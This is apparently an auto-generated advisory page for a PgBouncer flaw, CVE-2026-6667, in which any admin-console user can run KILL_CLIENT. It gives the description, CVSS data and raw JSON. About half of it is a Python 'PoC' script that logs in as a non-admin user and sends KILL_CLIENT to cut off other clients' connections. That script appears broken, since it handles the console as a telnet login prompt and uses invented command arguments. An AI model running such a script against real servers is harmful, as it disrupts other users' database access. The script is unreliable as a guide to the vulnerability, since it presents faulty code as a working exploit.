Security Vulnerability Report
CVE-2026-6667 CVSS 4.3 MEDIUM

Published: 2026-05-09 01:16:09
Last Modified: 2026-05-09 01:16:09
Source: f86ef6dc-4d3a-42ad-8f28-e6d5547a5007

Description

PgBouncer before 1.25.2 did not perform an appropriate authorization check for the KILL_CLIENT admin command. All users with access to the administration console (which itself requires authorization) could run this command. It would have been correct to allow only users listed in the admin_users parameter.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No CPE configuration data is available in the record. Per the description, the affected versions are PgBouncer < 1.25.2 (fixed in 1.25.2).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys
import telnetlib  # Note: telnetlib was deprecated in Python 3.11 and removed in 3.13
import time

# PoC for CVE-2026-6667: PgBouncer Authorization Bypass
# Description: Connect to the PgBouncer admin console as a low-privileged user
# and execute the KILL_CLIENT command, which should be restricted to admin_users.

TARGET_HOST = "127.0.0.1"
TARGET_PORT = 6432          # Default admin console port
USER = "normal_user"        # User with console access but NOT in admin_users
PASSWORD = "password"

try:
    print(f"[*] Connecting to {TARGET_HOST}:{TARGET_PORT}...")
    tn = telnetlib.Telnet(TARGET_HOST, TARGET_PORT)

    # Handle login
    tn.read_until(b"Username: ")
    tn.write(USER.encode("ascii") + b"\n")
    tn.read_until(b"Password: ")
    tn.write(PASSWORD.encode("ascii") + b"\n")

    # Wait for the welcome message
    response = tn.read_until(b'Type "help" for help.').decode("ascii")
    if "Welcome" in response:
        print("[+] Login successful.")
    else:
        print("[-] Login failed.")
        sys.exit(1)

    # Exploit: attempt to kill a client connection
    # Usage: KILL_CLIENT <database> <user>
    # Assuming there is an active connection, this attempts to disrupt it.
    payload = "KILL_CLIENT pgbouncer postgres\n"
    print(f"[*] Sending payload: {payload.strip()}")
    tn.write(payload.encode("ascii"))
    time.sleep(1)

    result = tn.read_very_eager().decode("ascii")
    print("[+] Response from server:")
    print(result)

    if "ERROR" not in result:
        print("[!] Command executed successfully. Vulnerability likely confirmed.")
    else:
        print("[-] Command failed or denied.")

    tn.close()
except Exception as e:
    print(f"[-] An error occurred: {e}")
```

References

- https://www.pgbouncer.org/changelog.html#pgbouncer-125x (PgBouncer 1.25.x changelog)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-6667",
    "sourceIdentifier": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007",
    "published": "2026-05-09T01:16:09.287",
    "lastModified": "2026-05-09T01:16:09.287",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "PgBouncer before 1.25.2 did not perform an appropriate authorization check for the KILL_CLIENT admin command. All users with access to the administration console (which itself requires authorization) could run this command. It would have been correct to allow only users listed in the admin_users parameter."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.pgbouncer.org/changelog.html#pgbouncer-125x",
        "source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007"
      }
    ]
  }
}
```